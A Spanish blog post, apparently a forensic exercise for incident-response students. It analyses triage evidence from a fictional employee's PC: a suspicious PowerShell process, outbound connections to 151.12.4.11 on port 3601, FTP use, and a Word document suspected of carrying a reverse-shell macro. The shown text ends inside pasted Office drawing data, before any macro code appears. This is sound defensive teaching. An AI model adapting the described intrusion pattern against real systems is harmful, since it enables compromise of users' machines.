tag:blogger.com,1999:blog-47898947826379218352024-03-02T02:07:37.325+01:00The Honey BlogComunidad de ciberseguridad. Fomento de buenas practicas. Sensibilización del uso responsable de las tecnologias. Gestión proyecto educativo Centinel.Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.comBlogger104125tag:blogger.com,1999:blog-4789894782637921835.post-37430069351675898702024-01-15T12:43:00.002+01:002024-01-15T12:51:26.940+01:00Detección de intrusión. Reverse Shell escondida en macros.<div style="text-align: justify;">Hola a todos he creado este artículo a raíz de uno de los ejercicios que he puesto a mis alumnos de la asignatura de Gestión de Respuesta Frente a Incidentes de Seguridad dentro del Certificado de Profesionalidad de Castilla La-Mancha, en la resolución de este caso forense pretendo mostrar cómo llevar a cabo un ejercicio forense para descubrir qué ha sucedido durante un incidente. En el siguiente artículo se podrá ver cómo se tratan las evidencias y qué herramientas usamos para descubrir lo sucedido y, con ello, realizar un informe del caso.</div><p class="MsoNormal" style="text-align: justify;"><b>Autor:</b><span lang="EN-US"> David Bernal<o:p></o:p></span></p><p class="MsoNormal" style="text-align: justify;"><span lang="EN-US">Twitter: @db3rn4l.</span></p><p class="MsoNormal" style="text-align: justify;"></p><p class="MsoNormal" style="text-align: justify;"><span lang="EN-US">Linkedin: </span><a href="https://www.linkedin.com/in/davidbernal89/"><span lang="EN-US">https://www.linkedin.com/in/davidbernal89/</span></a></p><p class="MsoNormal" style="text-align: justify;"><br /></p><p class="MsoNormal"><b><span style="line-height: 107%;"><span style="font-size: medium;">Antecedentes:</span></span></b></p><div style="text-align: justify;">La empresa Renter nos ha contratado para realizar un ejercicio forense en el que, según dice la empresa, creen que el ordenador de Raúl ha sido vulnerado.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Raúl ha notado que su equipo ha emitido algunas ventanas azules que se cierran rápidamente y ralentización del equipo mientras está trabajando.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">El sujeto afectado es un empleado administrativo que se encarga de gestionar los préstamos de las furgonetas de la empresa, por lo que no tiene conocimientos informáticos, más allá de los básicos para realizar su trabajo.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Renter es una empresa (ficticia) que se dedica a prestar furgonetas en alquiler.</div><p class="MsoNormal"><span style="font-size: 10pt; line-height: 107%;"><o:p> </o:p></span></p>
<p class="MsoNormal"><b><span style="line-height: 107%;"><span style="font-size: medium;">Evidencias:<o:p></o:p></span></span></b></p>
<div style="text-align: justify;">Como evidencias disponemos de un triage completo realizado mediante la herramienta Windows Live Response de Brimor Labs que se puede descargar del siguiente enlace <a href="https://www.brimorlabs.com/tools/">https://www.brimorlabs.com/tools/</a>.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Windows Live Respones (en adelante WLR) es una herramienta gratuita GNU desarrollada por Brian Moran que permite la recolección de la memoria volátil (memoria RAM), la realización de un triage mediante el cual se obtienen números registros volátiles importantes y una imagen del disco duro del equipo afectado.</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNBR1IWCrJ3Tgjmt1zMpJYfQd0vnrAgIjUpOZS18B80ItoG-ZSyPt7Hioc45wrccAJk1F-pUV4fX4N4HzOc1owDC_GlTdKtmhfmz7H91yHVmEMFu3TjBqnVjxA5qa3HKG1l9vNIOttNbxz-7krCm0iCNyrcm2YtPv5BfYUfyDHQmcU8EKl9Zdug1QutI8/s338/Imagen1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="294" data-original-width="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNBR1IWCrJ3Tgjmt1zMpJYfQd0vnrAgIjUpOZS18B80ItoG-ZSyPt7Hioc45wrccAJk1F-pUV4fX4N4HzOc1owDC_GlTdKtmhfmz7H91yHVmEMFu3TjBqnVjxA5qa3HKG1l9vNIOttNbxz-7krCm0iCNyrcm2YtPv5BfYUfyDHQmcU8EKl9Zdug1QutI8/s16000/Imagen1.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>
<div style="text-align: justify;">En el caso en el que nos encontramos, disponemos de un triage completo, compuesto por las imágenes forenses (memoria e imagen del disco) y los datos volátiles obtenidos en vivo, tal y como se puede observar en las imágenes inferiores.</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbhpjI5-rOBBUzBvFUoOEUSLR3rVANYozZsw8F-LYQW6w7WA8VCAw3jAtGg-ucLdE2NVsqnjxoT0N9BuKUaYvxoJJiSro9Lez45LDU-AK2vl0TSZ4WW2mE0CvoOLAfXwJxsoMSWwhUoNPa97yYGNe52DZM2o_n-aP8X5RS6729QjlMpxPdVSy6hDzYrLk/s567/Imagen2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="91" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbhpjI5-rOBBUzBvFUoOEUSLR3rVANYozZsw8F-LYQW6w7WA8VCAw3jAtGg-ucLdE2NVsqnjxoT0N9BuKUaYvxoJJiSro9Lez45LDU-AK2vl0TSZ4WW2mE0CvoOLAfXwJxsoMSWwhUoNPa97yYGNe52DZM2o_n-aP8X5RS6729QjlMpxPdVSy6hDzYrLk/s16000/Imagen2.png" /></a></div><p></p><div style="text-align: justify;">Directorio ForensicImages:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHPtIqB-yc5xRpN3m4RTstn1iv_HvRR24xN7plGAIqVPOB6yymwM5vkNv1hHX89SaoExj9kIbeODAFkI4ym4L9MA4fnc46G6RpLjyz7Z-WcQUJb69egCXjfg0I9TTDE1PymaHxk4-r_6Q4Vrg0QqlTmjh8SpddIEwdNrnpzWVyRmswwlSTKhCRK-Wh2Ug/s567/Imagen3.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="65" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHPtIqB-yc5xRpN3m4RTstn1iv_HvRR24xN7plGAIqVPOB6yymwM5vkNv1hHX89SaoExj9kIbeODAFkI4ym4L9MA4fnc46G6RpLjyz7Z-WcQUJb69egCXjfg0I9TTDE1PymaHxk4-r_6Q4Vrg0QqlTmjh8SpddIEwdNrnpzWVyRmswwlSTKhCRK-Wh2Ug/s16000/Imagen3.png" /></a></div><div style="text-align: justify;">Directorio LiveResponseData:</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoQMq5VFmtACNq0YzUqvlVlh69lTIUIxD9ZaDp-cEQGocCvetC9kFTWqSfhgYsXUP5sVVpngpoFPmNO0XDBASTYzbA2gSTNyTwDJHJg-UOurS88IMEhW5lgqfcZHOj8gOftFbqvV0WKFiUpJ8sxkgYB8LWRp7mfAoastZUUFlpoou5q2IMFQGDc_JAabw/s567/Imagen4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="113" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoQMq5VFmtACNq0YzUqvlVlh69lTIUIxD9ZaDp-cEQGocCvetC9kFTWqSfhgYsXUP5sVVpngpoFPmNO0XDBASTYzbA2gSTNyTwDJHJg-UOurS88IMEhW5lgqfcZHOj8gOftFbqvV0WKFiUpJ8sxkgYB8LWRp7mfAoastZUUFlpoou5q2IMFQGDc_JAabw/s16000/Imagen4.png" /></a></div><p class="MsoNormal"><b><span style="font-size: medium;">Análisis de evidencias. Triage:<br /></span></b><br />Comenzamos revisando el archivo system_info.txt dentro de la carpeta BasicInfo. <br /><br />En este archivo obtendremos datos importantes tales como el sistema operativo, nombre del equipo, direccionamiento IP y la zona horaria del sistema, dato muy importante que nos ayudará a establecer una línea temporal con los eventos ocurridos dentro del sistema.</p><p class="MsoNormal">System Info:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6bWJ47-yjks65LUz0CgNb2wdGMs_pvuGuEgYVFRt6d3qT9pzPdcwWyKlYvfXz9i5uDRxcf-H65eGZyV4efeGQhqGFBokpsslDFhbhfKlMlsTBhvAXnjKMOSXtWleSiJpGawHalw7aqm6Jza_XXW_W62LDB6IHP9eRHG142qmIYdCdfw67Dx__byQw7_I/s409/Imagen5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="296" data-original-width="409" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6bWJ47-yjks65LUz0CgNb2wdGMs_pvuGuEgYVFRt6d3qT9pzPdcwWyKlYvfXz9i5uDRxcf-H65eGZyV4efeGQhqGFBokpsslDFhbhfKlMlsTBhvAXnjKMOSXtWleSiJpGawHalw7aqm6Jza_XXW_W62LDB6IHP9eRHG142qmIYdCdfw67Dx__byQw7_I/s16000/Imagen5.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div style="text-align: justify;">El siguiente paso que damos es echar un vistazo dentro de los procesos del sistema, para ello abrimos el archivo PsList.txt.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">En la tabla de procesos que se puede ver en el archivo observamos un proceso powershell, algo bastante sospechoso ya que Raúl no tiene conocimientos suficientes como para realizar trabajos con esta herramienta.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Desgraciadamente el archivo PsList.txt no nos muestra el proceso padre de cada proceso para saber de dónde puede provenir la ejecución de este proceso powershell.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">PsList.txt:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDiuwFraf3Z2SG2rz0KjFKR-0o317MWG5xU9ivaahKZiUGZlMvfU-rlRNx1418yCNRK3FjqichyphenhyphenDp2It0BHs8SuAl1jkQa8FT7dbKA9wxOfTTBhcZkpgrsvZhyphenhyphenqMVT0OXHMsT0fu9Bhdxd5D0eTll0MD_QWAjifXeOonv_o2TAhABVvFrTf7upA3lzl38/s715/Imagen6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="715" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDiuwFraf3Z2SG2rz0KjFKR-0o317MWG5xU9ivaahKZiUGZlMvfU-rlRNx1418yCNRK3FjqichyphenhyphenDp2It0BHs8SuAl1jkQa8FT7dbKA9wxOfTTBhcZkpgrsvZhyphenhyphenqMVT0OXHMsT0fu9Bhdxd5D0eTll0MD_QWAjifXeOonv_o2TAhABVvFrTf7upA3lzl38/s16000/Imagen6.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN-VxfvrX7WveAkAVa9GDw0rrqWypLDIqPqCRGz652HyPYjz4BpKEOWdfrMCGnD6-UsABlkB2jFJ2eJZhvBaVqXHh7PmYYL6FrMYiWuurjepXElAhmmZlYmbsHOD2dLtzEPEKFhAYNjSZxiDSyOa06d1OrN3aY-vxnAuRSLWErBVQY9EeDDOgdDyAmOUM/s567/Imagen7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="302" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN-VxfvrX7WveAkAVa9GDw0rrqWypLDIqPqCRGz652HyPYjz4BpKEOWdfrMCGnD6-UsABlkB2jFJ2eJZhvBaVqXHh7PmYYL6FrMYiWuurjepXElAhmmZlYmbsHOD2dLtzEPEKFhAYNjSZxiDSyOa06d1OrN3aY-vxnAuRSLWErBVQY9EeDDOgdDyAmOUM/s16000/Imagen7.png" /></a></div><p class="MsoNormal"><span style="text-align: justify;">Ya disponemos de un hilo de donde tirar, por lo que deberíamos echar un vistazo a todo lo relacionado con powershell y más concretamente con el proceso con PID 360, pero vamos a dejarlo aparcado un poco y, para que no se nos escape nada, vamos a continuar mirando más archivos obtenidos en el triage.</span></p><div style="text-align: justify;">Otra cosa muy importante que revisar son siempre las conexiones de red de los equipos, el triage de WLR, ofrece varios archivos con registros de las conexiones de red que existen en el momento de la realización del triage.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Durante este ejercicio nos vamos a centrar en el archivo cports.html dentro de la carpeta NetworkInfo, que es un archivo realizado en HTML (visible desde un navegador web) mediante el cual se pueden apreciar las conexiones de red que realiza un equipo.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Si nos fijamos detenidamente se puede observar que, desde la IP de la máquina de Raúl, se realiza una conexión a la IP 151.12.4.11 mediante el proceso powershell al puerto 3601. Esta dirección IP no se corresponde a ninguna dirección IP de la empresa Renter, por lo que se está realizando contra un host de Internet… También es sospechoso el puerto ya que no se corresponde a ningún puerto conocido por ningún servicio al que acceda la empresa.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Adicionalmente podemos observar una conexión FTP a la misma dirección IP, lo que nos puede indicar que alguien ha estado transfiriendo archivos entre la máquina afectada y esa máquina desconocida.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">cports.html:</div>
<p class="MsoNormal"><span style="font-size: 10pt; line-height: 107%;"><o:p></o:p></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQSDrFxdvgxslHcYau38awQGuxioSdDX8oiIXn3jzU8mx7uYk5iSfW-99am-R9YnhU23vCp1ciMyeQk8pQRXWGOv79_1HJpDl4uARnD3k5Xwd3JB20ENVSSIma2BDusXmn_05tT9DiyYL0TzgCoO4rVUBE3aryg1hSp8fEDUYGKfbwhXFBr5CogEJPKPw/s567/Imagen8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="118" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQSDrFxdvgxslHcYau38awQGuxioSdDX8oiIXn3jzU8mx7uYk5iSfW-99am-R9YnhU23vCp1ciMyeQk8pQRXWGOv79_1HJpDl4uARnD3k5Xwd3JB20ENVSSIma2BDusXmn_05tT9DiyYL0TzgCoO4rVUBE3aryg1hSp8fEDUYGKfbwhXFBr5CogEJPKPw/s16000/Imagen8.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div style="text-align: justify;">Continuando con la revisión de los archivos del triage, esta vez miramos en el archivo LastActivityView.html dentro de la carpeta BasicInfo.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Este archivo refleja las últimas ejecuciones realizadas en el sistema, observamos las ejecuciones de powershell, PID (360) que tenemos apuntado y posteriormente revisaremos cuando analicemos la memoria volátil en profundidad y la ejecución del ftp nativo de Windows. Nos llama mucho la atención que un usuario básico de Windows, que hace labores administrativas, haga uso de la herramienta nativa de ftp de Windows (normalmente se utilizan aplicaciones del tipo WinSCP para realizar transferencias de archivos FTP), por lo que nos lo apuntamos.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">También podemos comprobar que se ha realizado la ejecución del programa WINWORD.EXE (aplicación Word de office) y se ha abierto el archivo factura.doc, a estos registros no les vamos a hacer demasiado caso por el momento, ya que el PC es usado por una persona que suele realizar su trabajo diario con herramientas de office y maneja la facturación de sus clientes.</div><p class="MsoNormal"><!--[if gte vml 1]><v:rect id="Rectangle_x0020_36" o:spid="_x0000_s1033"
style='position:absolute;margin-left:0;margin-top:-.2pt;width:306.3pt;
height:9.15pt;z-index:251664384;visibility:visible;mso-wrap-style:square;
mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;
mso-wrap-distance-bottom:0;mso-position-horizontal:left;
mso-position-horizontal-relative:margin;mso-position-vertical:absolute;
mso-position-vertical-relative:text;v-text-anchor:middle' o:gfxdata="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
EtoyusETIXwGZ9GpqBdR47K+XitdaqmnTKHXg9Aq1Wjd/pAWV/U18M3nBhqbmYLG3knbb9YaEDIj
lLT9CQyN4TJKIHaE+uZCNIDjlpHk6Qt/lcyScCG3kAhTg+ukk2aDiEjMPUqitq+2X7iBxjqHaN2q
q5AQPlrl1iCtfGzKgdNtJ+PJBI+k6XaDoiyd3kKGT3OF86lmvzpYcbIpuLsfjk+8IZ3yhwhCrNGq
KgOOiYCzg2pqzTGBw7AikZXxN1eYsrRrnkbpGErpiCYhyiqKmcxTuE7lhTr6rrCBcZftGQxqmCQr
hMNAFVjTqFY1LapGqsPSqns+k7KckTTLmmllFVU13VnMWiEvA3O2vFqRN7TKTQw5zazwaeqeT7lr
ea6b6xOKKgEGL+znqLoXKAiGauVilmpK48U0rHJ2RrVrR77Bc1S7SJEwsn4zFztnt6JGOJcD4pUq
P/DNRy2QJnlfqS3tOtjeQ4k3DKptHw6XYTj4DK7geNoH2qqirSoaXMGZM5SL9KC47WcXOQWep5QC
U8sptRxTzyn1nNLIKY2c0swpTd/TJ6pwiq8OU30vPzCFGpYdsGa9hX36v/EvAAAA//8DAFBLAwQU
AAYACAAAACEAnGZGQbsAAAAkAQAAKgAAAGNsaXBib2FyZC9kcmF3aW5ncy9fcmVscy9kcmF3aW5n
MS54bWwucmVsc4SPzQrCMBCE74LvEPZu0noQkSa9iNCr1AcIyTYtNj8kUezbG+hFQfCyMLPsN7NN
+7IzeWJMk3ccaloBQae8npzhcOsvuyOQlKXTcvYOOSyYoBXbTXPFWeZylMYpJFIoLnEYcw4nxpIa
0cpEfUBXNoOPVuYio2FBqrs0yPZVdWDxkwHii0k6zSF2ugbSL6Ek/2f7YZgUnr16WHT5RwTLpRcW
oIwGMwdKV2edNS1dgYmGff0m3gAAAP//AwBQSwECLQAUAAYACAAAACEAu+VIlAUBAAAeAgAAEwAA
AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQCtMD/xwQAA
ADIBAAALAAAAAAAAAAAAAAAAADYBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBAzyA9wQIA
AGQGAAAfAAAAAAAAAAAAAAAAACACAABjbGlwYm9hcmQvZHJhd2luZ3MvZHJhd2luZzEueG1sUEsB
Ai0AFAAGAAgAAAAhAJJ9h+AdBwAASSAAABoAAAAAAAAAAAAAAAAAHgUAAGNsaXBib2FyZC90aGVt
ZS90aGVtZTEueG1sUEsBAi0AFAAGAAgAAAAhAJxmRkG7AAAAJAEAACoAAAAAAAAAAAAAAAAAcwwA
AGNsaXBib2FyZC9kcmF3aW5ncy9fcmVscy9kcmF3aW5nMS54bWwucmVsc1BLBQYAAAAABQAFAGcB
AAB2DQAAAAA=
" filled="f" strokecolor="red" strokeweight="1pt">
<w:wrap anchorx="margin"/>
</v:rect><![endif]--><!--[if !vml]--><span style="mso-ignore: vglayout; position: relative; z-index: 251664384;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoBPr9-SkBoxXRPz1rfVuEMCFFpX9NJ4Mev_qv6jlW7mPQcdiUtSq4m5DHJ78V6WgO4fDmXxXBeKKY5JGap0mkJVpIKucYTYj4nGWFMBaGVt6RYntKeAHkMUKcYZKF3EGO3PKhnmjNy2c_4kZHidrs_yLPgmKMXgW54cNl40okUQOLsJ5CbmyofAYkFbk/s567/Imagen9.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="135" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoBPr9-SkBoxXRPz1rfVuEMCFFpX9NJ4Mev_qv6jlW7mPQcdiUtSq4m5DHJ78V6WgO4fDmXxXBeKKY5JGap0mkJVpIKucYTYj4nGWFMBaGVt6RYntKeAHkMUKcYZKF3EGO3PKhnmjNy2c_4kZHidrs_yLPgmKMXgW54cNl40okUQOLsJ5CbmyofAYkFbk/s16000/Imagen9.png" /></a></div><br /><span style="height: 14px; left: 0px; position: absolute; top: -1px; width: 411px;"><br /></span><!--[endif]--><!--[if gte vml 1]><v:rect id="Rectangle_x0020_39"
o:spid="_x0000_s1031" style='position:absolute;margin-left:0;margin-top:49.85pt;
width:306.3pt;height:9.15pt;z-index:251668480;visibility:visible;
mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;
mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;
mso-position-horizontal:left;mso-position-horizontal-relative:margin;
mso-position-vertical:absolute;mso-position-vertical-relative:text;
v-text-anchor:middle' o:gfxdata="UEsDBBQABgAIAAAAIQC75UiUBQEAAB4CAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbKSRvU7DMBSF
dyTewfKKEqcMCKEmHfgZgaE8wMW+SSwc27JvS/v23KTJgkoXFsu+P+c7Ol5vDoMTe0zZBl/LVVlJ
gV4HY31Xy4/tS3EvRSbwBlzwWMsjZrlprq/W22PELHjb51r2RPFBqax7HCCXIaLnThvSAMTP1KkI
+gs6VLdVdad08ISeCho1ZLN+whZ2jsTzgcsnJwldluLxNDiyagkxOquB2Knae/OLUsyEkjenmdzb
mG/YhlRnCWPnb8C898bRJGtQvEOiVxjYhtLOxs8AySiT4JuDystlVV4WPeM6tK3VaILeDZxIOSsu
ti/jidNGNZ3/J08yC1dNv9v8AAAA//8DAFBLAwQUAAYACAAAACEArTA/8cEAAAAyAQAACwAAAF9y
ZWxzLy5yZWxzhI/NCsIwEITvgu8Q9m7TehCRpr2I4FX0AdZk2wbbJGTj39ubi6AgeJtl2G9m6vYx
jeJGka13CqqiBEFOe2Ndr+B03C3WIDihMzh6RwqexNA281l9oBFTfuLBBhaZ4ljBkFLYSMl6oAm5
8IFcdjofJ0z5jL0MqC/Yk1yW5UrGTwY0X0yxNwri3lQgjs+Qk/+zfddZTVuvrxO59CNCmoj3vCwj
MfaUFOjRhrPHaN4Wv0VV5OYgm1p+LW1eAAAA//8DAFBLAwQUAAYACAAAACEASomY8MQCAABkBgAA
HwAAAGNsaXBib2FyZC9kcmF3aW5ncy9kcmF3aW5nMS54bWysVVtP2zAUfp+0/2D5HZL0wtqKgEoH
aBICRJh4No7TRHNsz3ZDyq/f8SVtxRCTtvWh9bl9/s7NPT3vW446pk0jRY6z4xQjJqgsG7HO8ffH
q6MZRsYSURIuBcvxlhl8fvb50ylZrDVRdUMRIAizIDmurVWLJDG0Zi0xx1IxAbZK6pZYEPU6KTV5
AeSWJ6M0PUla0gh8tof6SixBG938BRSX9AcrV0R0xAAkp4tDTeTI6b8jk4XorrUq1L12zOltd69R
U+YYKidICyXCSTRENxCTN1HrPUBf6db5y6pCPXQgnaXZeIrRNsfj2WQyH00DHustouAwns3TNIPL
